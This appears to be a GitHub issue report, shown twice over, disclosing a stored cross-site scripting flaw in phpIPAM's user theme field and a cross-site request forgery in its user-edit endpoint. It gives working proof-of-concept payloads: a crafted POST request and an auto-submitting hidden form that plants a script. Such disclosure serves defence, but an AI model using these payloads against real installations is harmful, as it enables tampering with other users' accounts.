<td><?php print $user->theme=="" ? _("Default") : $user->theme ?></td>
in /app/admin/users/print-user.php is vulnerable to XSS.
Poc1:
Attacker:
Change theme parameter in user settings. POST /app/tools/user-menu/user-edit.php real_name=test&email=test%40test.com&password1=&password2=&theme=%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E&lang=1&mailNotify=No&mailChangelog=No&menuCompact=1&menuType=Dynamic
Victim:
View attacker user in admin panel
(/index.php?page=administration§ion=users&subnetId=ID)
Poc2: /app/tools/user-menu/user-edit.php is vulnerable to CSRF.
An attacker can create a page with the following snippet and cause any user to change their settings and later trigger the XSS-vuln. <form method="POST" action="http://localhost/phpipam/app/tools/user-menu/user-edit.php"> <input type="hidden" value="test" name="real_name"> <input type="hidden" value="test@test.com" name="email"> <input type="hidden" value="" name="password1"> <input type="hidden" value="" name="password2"> <input type="hidden" value="<script>alert('XSS');</script>" name="theme"> <input type="hidden" value="1" name="lang"> <input type="hidden" value="No" name="mailNotify"> <input type="hidden" value="No" name="mailChangelog"> <input type="hidden" value="1" name="menuCompact"> <input type="hidden" value="Dynamic" name="menuType"> <input type="submit" value=""></form> <script>document.forms[0].submit();</script>
The text was updated successfully, but these errors were encountered:
<td><?php print $user->theme=="" ? _("Default") : $user->theme ?></td>in /app/admin/users/print-user.php is vulnerable to XSS.
Poc1:
Attacker:
Change theme parameter in user settings.
POST /app/tools/user-menu/user-edit.phpreal_name=test&email=test%40test.com&password1=&password2=&theme=%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E&lang=1&mailNotify=No&mailChangelog=No&menuCompact=1&menuType=DynamicVictim:

View attacker user in admin panel
(/index.php?page=administration§ion=users&subnetId=ID)
Poc2:
/app/tools/user-menu/user-edit.php is vulnerable to CSRF.
An attacker can create a page with the following snippet and cause any user to change their settings and later trigger the XSS-vuln.
<form method="POST" action="http://localhost/phpipam/app/tools/user-menu/user-edit.php"><input type="hidden" value="test" name="real_name"><input type="hidden" value="test@test.com" name="email"><input type="hidden" value="" name="password1"><input type="hidden" value="" name="password2"><input type="hidden" value="<script>alert('XSS');</script>" name="theme"><input type="hidden" value="1" name="lang"><input type="hidden" value="No" name="mailNotify"><input type="hidden" value="No" name="mailChangelog"><input type="hidden" value="1" name="menuCompact"><input type="hidden" value="Dynamic" name="menuType"><input type="submit" value=""></form><script>document.forms[0].submit();</script>The text was updated successfully, but these errors were encountered: